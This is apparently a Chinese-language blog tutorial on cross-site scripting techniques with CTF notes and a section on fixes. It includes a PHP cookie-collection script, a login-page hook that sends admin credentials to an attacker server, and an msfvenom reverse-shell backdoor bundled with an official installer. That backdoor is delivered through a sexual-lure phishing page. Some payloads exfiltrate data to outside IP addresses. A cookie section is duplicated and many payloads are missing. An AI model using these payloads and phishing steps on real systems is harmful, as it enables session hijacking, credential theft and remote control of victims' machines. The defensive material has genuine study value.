文章目录

• url处XSS
• 图片处XSS攻击
• svg-xss
• • • 概念
    • 复现
• pdf-xss
• • • 概念
    • 复现
• 游览器翻译-xss
• flash-xss
• • • 概念
    • 常见造成xss中的swf文件函数
    • 举例说明：
• cookie的获取
• • • 概念
    • 代码审计
    • 复现
• cookie的获取
• • • 概念
    • 代码审计
    • 复现
• 页面信息获取
• • • 概念
    • 条件
    • 复现
• xss配合MSf钓鱼
• • • 概念
    • 复现
• XSS修复
• • • • 对危险字符进行过滤
      • 设置http-only
      • 设置CSP（content security policy）
      • 对长度进行限制，实体转义
• CTF各种骚姿势
• • • • 服务端接受
      • 远程调用
      • 过滤script
      • 过滤img
      • 过滤空格
      • body标签
• CTF场景题
• • • • 场景1
      • 场景2
      • 场景3

常用标签的绕过：

xss 常用标签及绕过姿势总结 - FreeBuf网络安全行业门户

url处XSS

代码示例

payload:

http://127.0.0.1/xss-demo/xss.php?x=%3Cscript%3Ealert(%27cong%27);%3C/script%3E

图片处XSS攻击

代码示例

"; ?> 

可以看到普通的xss是没有用的，因为源码为alert(‘213’);>，这样是无法触发xss的，可以用img标签的错误触发事件

payload：
http://127.0.0.1/xss-demo/xss.php?x=y οnerrοr=“alert(‘1’)”

svg-xss

1. 概念

   1. SVG（可扩展矢量图形）是一种基于XML的矢量图形格式，用于描述二维图形。它广泛用于网页中的图形和动画，因为它可以无损缩放，并且由浏览器直接支持。由于SVG文件是基于XML的文本文件，它们可以包含脚本（如JavaScript）。如果SVG文件没有正确处理和过滤，恶意用户可以在SVG文件中嵌入恶意脚本，从而进行XSS攻击，目前主流的浏览器都已经支持SVG图片的渲染。

2. 复现

   1. 代码示例：

      test.svg  

   2. 增加以下代码子访问即可触发xss代码

      

pdf-xss

1. 概念

   1. 在一些pdf编辑器中可以给pdf添加javascript动作导致的在游览器打开pdf文件时遭受xss攻击

2. 复现

   1. 下载安装迅捷pdf编辑器

   2. 新建一个pdf

   3. 按照以下操作

      1. 

   4. 输入一下动作

      1. 

   5. 保存，在游览器中查看，成功执行

      1. 

游览器翻译-xss

本来页面的xss被过滤了，但是由于一些扩展有重新加载出来，例如翻译货站

代码示例

edge： 行之在线测试  
  Políticas de Privacidade Usaremos seus dados pessoais para resolver disputas, solucionar problemas e aplicar nossos Termos e Condições de Uso. 
 Para prevenir abusos no app/site, o Badoo usa decisões automáticas e moderadores para bloquear contas, como parte de seu procedimento de moderação. Para isso, nós conferimos contas e mensagens para encontrar conteúdo que indicam quebra dos nossos Termos e Condições de Uso. Isso é feito através de uma  OUR PAYLOAD IN TEXT FORM  
 
 ">  //这里写Payload  
 
 
 Políticas de Privacidade 

flash-xss

1. 概念

   1. Flash是由Adobe开发的一种多媒体软件平台，用于创建动画、游戏和富互联网应用（RIA）。它包含Adobe Flash Player和Adobe Flash Professional（后更名为Adobe Animate）。Flash中的XSS攻击利用了Flash应用（特别是SWF文件）中的漏洞，通过注入恶意脚本，使这些脚本在用户的浏览器中执行。

2. 常见造成xss中的swf文件函数

   1. navigateToURL
   2. getURL
   3. ExternalInterface.call
   4. htmlText
   5. 参考文章：（链接）

3. 举例说明：

   1. 从网站下载swf文件，放在swf反编译工具中反编译

      1. 

   2. 全局搜索上述swf文件函数，找出可以的注入点

      1. 
      2. payload：http://127.0.0.1/uploader.swf?jsobject=alert(1)

cookie的获取

1. 概念

   1. 通过javascript获取网站的cookie的信息

2. 代码审计

   1.   配置文件config.inc.php:      --------------------------------------------------------------------------------------------------   cookie.php:          $time=date('Y-m-d g:i:s');       $ipaddress=getenv ('REMOTE_ADDR');       $cookie=$_GET['cookie'];       $referer=$_SERVER['HTTP_REFERER'];       $useragent=$_SERVER['HTTP_USER_AGENT'];       $query="insert cookies(time,ipaddress,cookie,referer,useragent)        values('$time','$ipaddress','$cookie','$referer','$useragent')";       $result=mysqli_query($link, $query);   }   header("Location:http://43.139.186.80/1.html");//重定向到一个可信的网站   ?> 

3. 复现

   1. 找到存在xss漏洞的留言板，存入payload

      

   2. 被重定向1.html

      1. 

   3. 在在后台查看获取到的cookie信息

      1. 
      2. 

cookie的获取

1. 概念

   1. 通过javascript获取网站的cookie的信息

2. 代码审计

   1.   配置文件config.inc.php:      --------------------------------------------------------------------------------------------------   cookie.php:          $time=date('Y-m-d g:i:s');       $ipaddress=getenv ('REMOTE_ADDR');       $cookie=$_GET['cookie'];       $referer=$_SERVER['HTTP_REFERER'];       $useragent=$_SERVER['HTTP_USER_AGENT'];       $query="insert cookies(time,ipaddress,cookie,referer,useragent)        values('$time','$ipaddress','$cookie','$referer','$useragent')";       $result=mysqli_query($link, $query);   }   header("Location:http://43.139.186.80/1.html");//重定向到一个可信的网站   ?> 

3. 复现

   1. 找到存在xss漏洞的留言板，存入payload

      

   2. 被重定向1.html

      1. 

   3. 在在后台查看获取到的cookie信息

      1. 
      2. 

页面信息获取

1. 概念

   1. 当我们拿下网站权限时，需要进入网站看看，此时需要admin的账号和密码，就可以在源码中插入xss攻击代码获取密码的表单

2. 条件

   1. 具备web权限，写入权限

3. 复现

   1. 网站部分代码示例：

      login_check.php  	$query="update $met_config set value='$turefile' where name='met_adminfile' and lang='metinfo'"; 	$db->query($query); } //dump($_SERVER); //echo $_SERVER[HTTP_REFERER]; //$HTTP_REFERERs=explode('?',$_SERVER[HTTP_REFERER]); //echo strrev(substr(strrev($HTTP_REFERERs[0]),0,7)); if($action=="login"){ 	$metinfo_admin_name     = $login_name; 	$metinfo_admin_pass     = $login_pass; 	$up = ''; //将账号密码发送到攻击者服务器中 	echo $up; 	$metinfo_admin_pass=md5($metinfo_admin_pass); 	/*code*/ 	if($met_login_code==1){ 		require_once $depth.'../include/captcha.class.php'; ...... ------------------------------------------------------------------------------------------ get.php //接受传来的账号和密码并写入newfile.txt当中 

   2. 当管理员登录是后台自动发送账号和密码

      1. 

xss配合MSf钓鱼

1. 概念

   1. 通过msf生成后门，利用beef上线受控或者钓到鱼之后，通过msf的监听来控制主机

2. 复现

   1. 生成后门poc.exe

      1.   msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.36.147 LPORT=6666 -f exe > poc.exe 

   2. 下载官方文件-保证安装正常

   3. 将后门与官方文件通过压缩软件捆绑在一起

      1. 将两压缩
      2. 
      3. 
      4. 

   4. msf启动监听

      1. msfconsole
      2. use exploit/multi/handler
      3. set payload windows/meterpreter/reverse_tcp
      4. set lhost 0.0.0.0
      5. set lport 6666
      6. run

   5. 制作钓鱼页面，这里采用色诱

      1. flash页面：doocop/Flash_Xss: Flash最新钓鱼源码对接官方API实现跟随官方升级而升级 (github.com)

      2. 替换下载点

         1. 

      3. 代码示例

         1.   诱导安装页面                            小迪与某主播SESE画面流出！
                          

         2. 

   6. 鱼儿点击网页上线

      1. 

XSS修复

1. 对危险字符进行过滤

   1. 变量过滤模版

        //自定义过滤函数 function remove_xss($val) {   // remove all non-printable characters. CR(0a) and LF(0b) and TAB(9) are allowed   // this prevents some character re-spacing such as    // note that you have to handle splits with \n, \r, and \t later since they *are* allowed in some inputs   $val = preg_replace('/([\x00-\x08,\x0b-\x0c,\x0e-\x19])/', '', $val);   // straight replacements, the user should never need these since they're normal characters   // this prevents like    $search = 'abcdefghijklmnopqrstuvwxyz';   $search .= 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';   $search .= '1234567890!@#$%^&*()';   $search .= '~`";:?+/={}[]-_|\'\\';   for ($i = 0; $i < strlen($search); $i++) {    // ;? matches the ;, which is optional    // 0{0,7} matches any padded zeros, which are optional and go up to 8 chars    // @ @ search for the hex values    $val = preg_replace('/(&#[xX]0{0,8}'.dechex(ord($search[$i])).';?)/i', $search[$i], $val); // with a ;    // @ @ 0{0,7} matches '0' zero to seven times    $val = preg_replace('/(�{0,8}'.ord($search[$i]).';?)/', $search[$i], $val); // with a ;   }   // now the only remaining whitespace attacks are \t, \n, and \r   $ra1 = array('javascript', 'vbscript', 'expression', 'applet', 'meta', 'xml', 'blink', 'link', 'style', 'script', 'embed', 'object', 'iframe', 'frame', 'frameset', 'ilayer', 'layer', 'bgsound', 'title', 'base');   $ra2 = array('onabort', 'onactivate', 'onafterprint', 'onafterupdate', 'onbeforeactivate', 'onbeforecopy', 'onbeforecut', 'onbeforedeactivate', 'onbeforeeditfocus', 'onbeforepaste', 'onbeforeprint', 'onbeforeunload', 'onbeforeupdate', 'onblur', 'onbounce', 'oncellchange', 'onchange', 'onclick', 'oncontextmenu', 'oncontrolselect', 'oncopy', 'oncut', 'ondataavailable', 'ondatasetchanged', 'ondatasetcomplete', 'ondblclick', 'ondeactivate', 'ondrag', 'ondragend', 'ondragenter', 'ondragleave', 'ondragover', 'ondragstart', 'ondrop', 'onerror', 'onerrorupdate', 'onfilterchange', 'onfinish', 'onfocus', 'onfocusin', 'onfocusout', 'onhelp', 'onkeydown', 'onkeypress', 'onkeyup', 'onlayoutcomplete', 'onload', 'onlosecapture', 'onmousedown', 'onmouseenter', 'onmouseleave', 'onmousemove', 'onmouseout', 'onmouseover', 'onmouseup', 'onmousewheel', 'onmove', 'onmoveend', 'onmovestart', 'onpaste', 'onpropertychange', 'onreadystatechange', 'onreset', 'onresize', 'onresizeend', 'onresizestart', 'onrowenter', 'onrowexit', 'onrowsdelete', 'onrowsinserted', 'onscroll', 'onselect', 'onselectionchange', 'onselectstart', 'onstart', 'onstop', 'onsubmit', 'onunload');   $ra = array_merge($ra1, $ra2);   $found = true; // keep replacing as long as the previous round replaced something   while ($found == true) {    $val_before = $val;    for ($i = 0; $i < sizeof($ra); $i++) {      $pattern = '/';      for ($j = 0; $j < strlen($ra[$i]); $j++) {       if ($j > 0) {         $pattern .= '(';         $pattern .= '(&#[xX]0{0,8}([9ab]);)';         $pattern .= '|';         $pattern .= '|(�{0,8}([9|10|13]);)';         $pattern .= ')*';       }       $pattern .= $ra[$i][$j];      }      $pattern .= '/i';      $replacement = substr($ra[$i], 0, 2).''.substr($ra[$i], 2); // add in <> to nerf the tag      $val = preg_replace($pattern, $replacement, $val); // filter out the hex tags      if ($val_before == $val) {       // no replacements were made, so exit the loop       $found = false;      }    }   }   return $val; }  $code=$_GET['x']; echo $code."
      ";  ?> 

   2. 设置http-only

      1. 设置http-only可以防止防止客户端脚本（如 JavaScript）访问 cookie，从而防止通过 XSS 攻击窃取 cookie 信息。

      2. 设置过程

         1. php.ini中的session.cookie httponly =1
         2. 网站源码写入ini set(“session. cookie httponly”, 1);

   3. 设置CSP（content security policy）

      1. csp严格限制脚本的来源，可以防止恶意脚本的执行，可以进制内联脚本，就算在源码上写入xss代码页无法执行，就比如上面的模版，

      2. 在网站中加入header(“Content-Security-Policy: img-src ‘self’”);即可即使注释掉了百度的图片，他还是会加载

         1. 

   4. 对长度进行限制，实体转义

CTF各种骚姿势

参考文章：

xss 常用标签及绕过姿势总结 - FreeBuf网络安全行业门户

XSS总结 - 先知社区 (aliyun.com)

服务端接受

1. 远程调用

   1. payload：

2. 过滤script

   1. payload

3. 过滤img

   1. payload

4. 过滤空格

   1. payload

5. body标签

   1. payload

CTF场景题

1. 场景1

   1. 

   2. 管理员的cookie频繁变化，无法获取cookie直接登录，但是可以通过xss表单获取管理员的账号和密码

2. payload

   S('.laytable-cell-1-0-1').each(function(index,value) {     if (value.innerHTML.indexOf('ctf' + 'show') > -1) {         window.location.href = 'http://47.94.236.117/get.php?c=' + value.innerHTML;     } }); 

3. 场景2

   1. 后台管理员有功能页面，能够查看注册用户的账号密码，其中有一个修改的密码的功能，通过捉包分析，可以通过访问一个地址即可修改密码，get提交

4. payload：

   //跳转回被管理员发现 //页面在后台访问 

5. 场景3

   1. 后台管理员有功能页面，能够查看注册用户的账号密码，其中有一个修改的密码的功能，通过捉包分析，可以通过访问一个地址即可修改密码，post提交

6. payload

   $.ajax({     url: 'http://127.0.0.1/api/change.php',     type: 'post',     data: { p: '123' } }); 

通过对 XSS 漏洞原理的详细剖析和复现过程的具体演示，我们可以清晰地看到这种攻击手段的危害及其实现方式。了解这些知识不仅有助于网络安全从业人员提升自身技能，还能帮助开发者更好地编写安全的代码，从源头上防范潜在的安全威胁。然而，XSS 仅仅是众多网络攻击手段之一，网络安全的攻防战是一场持久战，需要我们不断学习和更新知识，采取严密的防护措施，以应对日益复杂的网络攻击。希望本文能够为读者提供有价值的参考，促进大家在实际工作中更好地保护网络系统的安全。